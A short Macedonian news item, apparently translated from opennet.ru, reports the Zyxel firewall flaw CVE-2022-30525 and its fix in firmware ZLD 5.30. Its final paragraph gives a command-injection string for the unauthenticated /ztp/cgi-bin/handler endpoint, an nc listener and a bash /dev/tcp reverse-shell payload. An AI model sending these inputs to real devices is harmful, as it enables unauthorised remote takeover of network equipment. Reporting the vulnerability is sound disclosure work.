Ранливост во заштитните ѕидови на Zyxel што овозможува извршување на кодот без автентикација

Критична ранливост (CVE-2022-30525) е идентификувана во уредите Zyxel од сериите ATP, VPN и USG FLEX, дизајнирани да ја организираат работата на заштитните ѕидови, IDS и VPN во претпријатијата, што му овозможува на надворешниот напаѓач да изврши код на уред без кориснички права без автентикација. За да изврши напад, напаѓачот мора да може да испраќа барања до уредот користејќи го протоколот HTTP/HTTPS. Zyxel ја поправи ранливоста во ажурирањето на фирмверот ZLD 5.30. Според услугата Shodan, моментално има 16213 потенцијално ранливи уреди на глобалната мрежа кои прифаќаат барања преку HTTP/HTTPS.

Операцијата се изведува со испраќање специјално дизајнирани команди до веб-ракувачот /ztp/cgi-bin/handler, достапен без автентикација. Проблемот е предизвикан од недостатокот на соодветно чистење на параметрите на барањето при извршување на команди на системот користејќи го повикот os.system што се користи во библиотеката lib_wan_settings.py и се извршува при обработка на операцијата setWanPortSt.

На пример, напаѓачот може да ја помине низата „; пинг 192.168.1.210;" што ќе доведе до извршување на командата „ping 192.168.1.210“ на системот. За да добиете пристап до командната школка, можете да извршите „nc -lvnp 1270“ на вашиот систем, а потоа да започнете обратна врска со испраќање барање до уредот со „; bash -c \»exec bash -i &>/dev/tcp/192.168.1.210/1270 <&1;\»;“.

Извор: opennet.ru

Додадете коментар